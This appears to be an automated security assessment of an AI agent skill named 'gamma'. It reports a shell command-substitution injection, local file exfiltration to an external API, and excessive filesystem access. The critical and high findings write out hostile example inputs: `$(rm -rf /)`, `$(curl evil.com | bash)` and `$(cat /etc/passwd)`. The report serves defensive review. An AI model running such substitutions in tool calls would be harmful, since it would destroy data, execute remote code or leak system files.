Trust Assessment
gamma received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Arbitrary Command Execution via Shell Substitution, Sensitive File Content Exfiltration to External API, Unrestricted File System Read Access.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Arbitrary Command Execution via Shell Substitution. The skill's documentation and examples demonstrate passing user-controlled input to the `gamma.sh` script using shell command substitution (e.g., `$(cat pitch.md)`). An attacker could craft malicious input like `$(rm -rf /)` or `$(curl evil.com \| bash)`, which would be executed by the shell *before* the `gamma.sh` script even starts, leading to arbitrary command execution on the host system. Remediation: avoid using shell command substitution for user-controlled input. Instead, pass content directly as a string argument, or use a temporary file if large content is needed, ensuring the file path is sanitized. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input. | LLM | SKILL.md:52 |
| HIGH | Sensitive File Content Exfiltration to External API. The skill allows reading arbitrary local files via shell command substitution (e.g., `$(cat /etc/passwd)`) and then sends the content of these files to the external `public-api.gamma.app` endpoint. This poses a significant risk of exfiltrating sensitive data from the host system to a third-party service. Remediation: restrict the skill's ability to read local files. If file input is necessary, implement strict allow-listing for file paths or directories, and ensure content is sanitized before transmission. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input. | LLM | SKILL.md:52 |
| MEDIUM | Unrestricted File System Read Access. The skill, through its demonstrated usage pattern (`$(cat file)`), implicitly grants itself unrestricted read access to the filesystem. This capability is excessive for a skill primarily designed to generate content from provided text, and it enables the data exfiltration and command injection risks identified above. Remediation: re-evaluate the necessity of local file access. If required, implement strict access controls, sandboxing, or explicit user confirmation for file operations. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input. | LLM | SKILL.md:52 |
Full report: https://skillshield.io/report/1916a59c85cd950e